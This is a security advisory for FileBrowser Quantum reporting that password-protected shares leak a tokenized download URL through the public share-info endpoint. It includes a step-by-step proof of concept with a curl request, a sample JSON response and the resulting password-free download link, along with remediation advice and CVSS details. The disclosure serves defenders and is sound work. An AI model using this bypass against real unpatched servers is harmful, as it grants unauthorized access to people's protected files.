Skip to content

Incomplete Remediation of CVE-2026-27611: Password-Protected Share Bypass via /public/api/share/info

High
gtsteffaniak published GHSA-525j-95gf-766f Mar 7, 2026

Package

FileBrowser Quantum

Affected versions

1.3.0-beta
1.2.1-stable

Patched versions

1.3.1-beta
1.2.2-stable

Description

Summary

The remediation for CVE-2026-27611 appears incomplete. Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2.

Details

The issue stems from two flaws:

  1. Tokenized download URLs are written into the persistent share model
backend/http/share.go
convertToFrontendShareResponse(line 63)
s.DownloadURL = getShareURL(r, s.Hash, true, s.Token)
  1. The public endpoint:
GET /public/api/share/info
returns shareLink.CommonShare without clearing DownloadURL.

Since Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.

The previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL

PoC

  1. Create a password protected share as an authenticated user

  2. Copy the public share URL (the clipboard WITHOUT an arrow)
    http://yourdomain/public/share/yoursharedhash
    Example:
    http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw

  3. Query the public share endpoint via curl request:
    curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*'
    Example:
    curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*'

    Response includes:

    {
    "shareTheme": "default",
    "title": "Shared files - test.md",
    "description": "A share has been sent to you to view or download.",
    "disableSidebar": false,
    "downloadURL": "http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D",
    "shareURL": "http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw",
    "enforceDarkLightMode": "default",
    "viewMode": "normal",
    "shareType": "normal",
    "sidebarLinks": [
        {
            "name": "Share QR Code and Info",
            "category": "shareInfo",
            "target": "#",
            "icon": "qr_code"
        },
        {
            "name": "Download",
            "category": "download",
            "target": "#",
            "icon": "download"
        },
        {
            "name": "sourceLocation",
            "category": "custom",
            "target": "/srv/test.md",
            "icon": ""
        }
    ],
    "hasPassword": true,
    "disableLoginOption": false,
    "sourceURL": "/srv/test.md"
}

Note the response "hasPassword": true and downloadURL includes token= parameter

  1. Take the downloadURL(seen in json data response) and replace \u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering
    Example:
    http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D

Browser downloads file immediately without requiring password

Impact

An unauthenticated attacker can retrieve password protected shared files without the password.
Results in authentication bypass, unauthorized file access and confidentiality compromise

Recommended Remediation

Sanitize DownloadURL in public share info responses via commonShare.DownloadURL = "" before returning the json response in shareInfoHandler method located in backend/share.go

Structural fix, only generate tokenized URLs after successful password validation

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID

CVE-2026-30933

Weaknesses

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. Learn more on MITRE.

Missing Authentication for Critical Function

The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. Learn more on MITRE.

Client-Side Enforcement of Server-Side Security

The product is composed of a server that relies on the client to implement a mechanism that is intended to protect the server. Learn more on MITRE.

Credits